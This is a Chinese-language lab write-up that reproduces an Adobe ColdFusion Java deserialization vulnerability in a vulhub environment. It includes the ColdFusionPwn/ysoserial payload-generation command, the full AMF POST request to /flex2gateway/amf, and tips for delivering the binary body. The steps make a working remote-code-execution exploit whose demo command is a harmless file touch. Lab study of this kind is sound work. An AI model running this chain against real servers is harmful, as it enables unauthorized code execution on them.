1、漏洞描述
Adobe ColdFusion是美国Adobe公司的一种动态Web服务器产品,其运行的CFML(ColdFusion标记语言)是针对Web应用程序的一种程序设计语言。
攻击者可利用该漏洞在冲突应用程序的一部分中执行任意代码或造成拒绝服务。以下版本受到影响:Adobe ColdFusion(2016版)更新3及之前的版本, ColdFusion 11 Update 11及之前的版本,ColdFusion 10 Update 22及之前的版本。
2、启动靶场
3、访问网址
http://x.x.x.x:8500
发现是404网页,接着去访问
http://x.x.x.x:8500/CFIDE/administrator/index.cfm
发现这个网页和上个漏洞一样,但是这个网页是要输入vulhub,即可成功安装Adobe ColdFusion
3、我们使用ColdFusionPwn工具来生成POC
java -cp ColdFusionPwn-0.0.1-SNAPSHOT-all.jar:ysoserial.jar com.codewhitesec.coldfusionpwn.ColdFusionPwner -e CommonsBeanutils1 'touch /tmp/success' poc.ser
我在centos靶机上执行是不可以的
但是在kali上是可以运行的
4、生成poc.ser文件后,将POC作为数据包body发送给
http://your-ip:8500/flex2gateway/amf,Content-Type为application/x-amf:
POST /flex2gateway/amf HTTP/1.1
Host: your-ip:8500
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-amf
Content-Length: 2853
5、发送poc内容
由于编码问题,如果直接从Notepad++/Notepad里面复制粘贴为body部分,是不成功的,即使返回的状态码是200
正确的方法应该是:
右击选择Paste From File,上传poc.cer文件
再到Raw界面添加HTTP头部,如果成功,并且打算以后还需要用的话,右击选择Copy to File保存
6、进入容器检验poc
通过docekrid进入容器
Docker exec docker容器id -it /bin/bash